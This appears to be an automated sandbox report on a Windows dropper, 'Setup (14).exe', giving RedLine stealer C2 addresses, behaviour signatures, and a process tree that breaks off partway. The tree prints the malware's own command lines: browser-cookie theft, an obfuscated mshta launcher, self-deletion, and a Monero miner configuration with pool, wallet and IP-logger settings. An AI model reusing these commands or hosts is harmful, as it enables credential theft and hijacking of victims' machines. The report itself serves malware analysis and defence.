Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    179s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (14).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

v2

C2

195.2.78.163:25450

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Blocklisted process makes network request 1 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 38 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 22 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 53 IoCs
  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 6 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 8 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup (14).exe
    "C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"
    1⤵
    • Checks computer location settings
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3436
    • C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe
      "C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe"
      2⤵
      • Executes dropped EXE
      PID:1976
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f & erase "C:\Users\Admin\Documents\Fs0ALYADNu4GdeLmIDEafYql.exe" & exit
        3⤵
          PID:4328
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /im "Fs0ALYADNu4GdeLmIDEafYql.exe" /f
            4⤵
            • Kills process with taskkill
            PID:6620
      • C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe
        "C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe"
        2⤵
        • Executes dropped EXE
        PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8378084578.exe"
          3⤵
            PID:5900
            • C:\Users\Admin\AppData\Local\Temp\8378084578.exe
              "C:\Users\Admin\AppData\Local\Temp\8378084578.exe"
              4⤵
                PID:5644
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7236604058.exe"
              3⤵
                PID:7996
                • C:\Users\Admin\AppData\Local\Temp\7236604058.exe
                  "C:\Users\Admin\AppData\Local\Temp\7236604058.exe"
                  4⤵
                    PID:5152
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 744
                      5⤵
                      • Program crash
                      PID:8448
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 760
                      5⤵
                      • Program crash
                      PID:8596
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f & erase "C:\Users\Admin\Documents\3qJtxoADt5Bwhn7DiMi9yasB.exe" & exit
                  3⤵
                    PID:5788
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /im "3qJtxoADt5Bwhn7DiMi9yasB.exe" /f
                      4⤵
                      • Kills process with taskkill
                      PID:4520
                • C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe
                  "C:\Users\Admin\Documents\HQGFXLLjwG5SufKxgwvNcyK5.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:192
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 760
                    3⤵
                    • Program crash
                    PID:6004
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 788
                    3⤵
                    • Program crash
                    PID:5048
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 844
                    3⤵
                    • Program crash
                    PID:5400
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 828
                    3⤵
                    • Program crash
                    PID:5880
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 956
                    3⤵
                    • Program crash
                    PID:4964
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1004
                    3⤵
                    • Program crash
                    PID:5680
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1048
                    3⤵
                    • Program crash
                    PID:5356
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1352
                    3⤵
                    • Program crash
                    PID:4864
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1364
                    3⤵
                    • Program crash
                    PID:5512
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1476
                    3⤵
                    • Program crash
                    PID:6164
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1596
                    3⤵
                    • Program crash
                    PID:1384
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 1704
                    3⤵
                    • Program crash
                    PID:7732
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 992
                    3⤵
                    • Program crash
                    PID:7768
                • C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe
                  "C:\Users\Admin\Documents\AreuMkSthZVjdQsQv4v_hsUd.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3840
                • C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe
                  "C:\Users\Admin\Documents\vMrvfTC40fz0wJQSNnEb1vlj.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:3972
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 388
                    3⤵
                    • Program crash
                    PID:5812
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 368
                    3⤵
                    • Program crash
                    PID:6048
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 404
                    3⤵
                    • Program crash
                    PID:2804
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 624
                    3⤵
                    • Program crash
                    PID:5536
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 660
                    3⤵
                    • Program crash
                    PID:4924
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 696
                    3⤵
                    • Program crash
                    PID:4720
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3972 -s 708
                    3⤵
                    • Program crash
                    PID:6836
                • C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe
                  "C:\Users\Admin\Documents\L8_6iMKvWrCjH_BrTSZNnsZ8.exe"
                  2⤵
                  • Executes dropped EXE
                  • Checks BIOS information in registry
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of AdjustPrivilegeToken
                  PID:212
                • C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe
                  "C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1832
                  • C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe
                    C:\Users\Admin\Documents\Y2SB33o6zbn4ANHc4ULNYw_s.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4832
                • C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe
                  "C:\Users\Admin\Documents\A2AFe8yxnoM0pAQFO_osbdcb.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1672
                • C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe
                  "C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:1948
                  • C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe
                    "C:\Users\Admin\Documents\PMYOcQY_sK9WgaNnRHrGhfrV.exe"
                    3⤵
                      PID:1296
                  • C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe
                    "C:\Users\Admin\Documents\APG9Y7QLV0Wv4wkaMpjWjH5O.exe"
                    2⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:3736
                  • C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe
                    "C:\Users\Admin\Documents\OUCxGDOmocchEqru9lIGqpec.exe"
                    2⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2712
                  • C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe
                    "C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe"
                    2⤵
                    • Executes dropped EXE
                    PID:2720
                    • C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe
                      "C:\Users\Admin\Documents\DtfrI6pZuuWUoC6RfUcrXtwA.exe" -q
                      3⤵
                      • Executes dropped EXE
                      PID:4920
                  • C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe
                    "C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2688
                    • C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe
                      "C:\Users\Admin\Documents\Cd1_GhEkf6r5VyvSPccXa4pd.exe"
                      3⤵
                        PID:5400
                    • C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe
                      "C:\Users\Admin\Documents\TsYrvSvl_8Fg7XvPJfjVRBqk.exe"
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2348
                    • C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe
                      "C:\Users\Admin\Documents\8d_QkOtj1vJIPjPRfTvlMoul.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2140
                    • C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe
                      "C:\Users\Admin\Documents\HBOyOhd25JvX0sqL7MBdiEtp.exe"
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2332
                      • C:\Users\Admin\AppData\Roaming\8123329.exe
                        "C:\Users\Admin\AppData\Roaming\8123329.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4984
                      • C:\Users\Admin\AppData\Roaming\6623009.exe
                        "C:\Users\Admin\AppData\Roaming\6623009.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:4168
                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                          4⤵
                          • Executes dropped EXE
                          PID:1820
                      • C:\Users\Admin\AppData\Roaming\8464045.exe
                        "C:\Users\Admin\AppData\Roaming\8464045.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:1612
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          4⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:2808
                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                            5⤵
                              PID:4868
                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                6⤵
                                  PID:2276
                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                  6⤵
                                    PID:4580
                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    6⤵
                                      PID:7204
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                      6⤵
                                        PID:6544
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        6⤵
                                          PID:1924
                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                          6⤵
                                            PID:7584
                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                              PID:6116
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              6⤵
                                                PID:7204
                                        • C:\Users\Admin\AppData\Roaming\1859954.exe
                                          "C:\Users\Admin\AppData\Roaming\1859954.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5100
                                      • C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe
                                        "C:\Users\Admin\Documents\jaMb6qv8jKSPzTumizrvUr0t.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:1952
                                      • C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe
                                        "C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:3728
                                        • C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe
                                          C:\Users\Admin\Documents\QSjWABEot8afUaYKHNsOeMFK.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4800
                                      • C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe
                                        "C:\Users\Admin\Documents\iKBIlyzjFEyxcJCFAThmZJNH.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3596
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 660
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4652
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 676
                                          3⤵
                                          • Program crash
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2464
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 680
                                          3⤵
                                          • Program crash
                                          PID:4536
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 700
                                          3⤵
                                          • Program crash
                                          PID:5132
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 1076
                                          3⤵
                                          • Program crash
                                          PID:6088
                                      • C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe
                                        "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3156
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                          3⤵
                                            PID:4900
                                        • C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe
                                          "C:\Users\Admin\Documents\iOrJgzXZAN9GxViKD5epKQa9.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2360
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 480
                                            3⤵
                                            • Program crash
                                            PID:5232
                                        • C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe
                                          "C:\Users\Admin\Documents\gXDSBbnv0dqtpT7VRWOBQ6Wx.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1852
                                        • C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe
                                          "C:\Users\Admin\Documents\nSQuLz6LMvwW604cz6Cc5udc.exe"
                                          2⤵
                                            PID:2808
                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4932
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 2956
                                                4⤵
                                                • Program crash
                                                PID:7528
                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              PID:4988
                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:5228
                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                    PID:7100
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:9244
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:10988
                                                  • C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe
                                                    "C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:2116
                                                    • C:\Users\Admin\AppData\Local\Temp\is-OGD9A.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-OGD9A.tmp\gEga2cgo4qNeMiHj3tT00poP.tmp" /SL5="$10290,138429,56832,C:\Users\Admin\Documents\gEga2cgo4qNeMiHj3tT00poP.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:4428
                                                      • C:\Users\Admin\AppData\Local\Temp\is-T9KB6.tmp\Setup.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\is-T9KB6.tmp\Setup.exe" /Verysilent
                                                        4⤵
                                                          PID:4420
                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                            5⤵
                                                              PID:5424
                                                              • C:\Users\Admin\AppData\Local\Temp\is-68ILR.tmp\Stats.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-68ILR.tmp\Stats.tmp" /SL5="$20378,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                6⤵
                                                                  PID:5608
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-1H5D0.tmp\builder.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-1H5D0.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                    7⤵
                                                                      PID:6048
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                  5⤵
                                                                    PID:5452
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 760
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3340
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 816
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:6564
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 820
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:6764
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 792
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:7160
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 952
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:1420
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1348
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:7476
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1288
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:7644
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1412
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3140
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1444
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3500
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                    5⤵
                                                                      PID:5540
                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                        6⤵
                                                                          PID:4848
                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                        5⤵
                                                                          PID:5584
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QKSJ6.tmp\WEATHER Manager.tmp
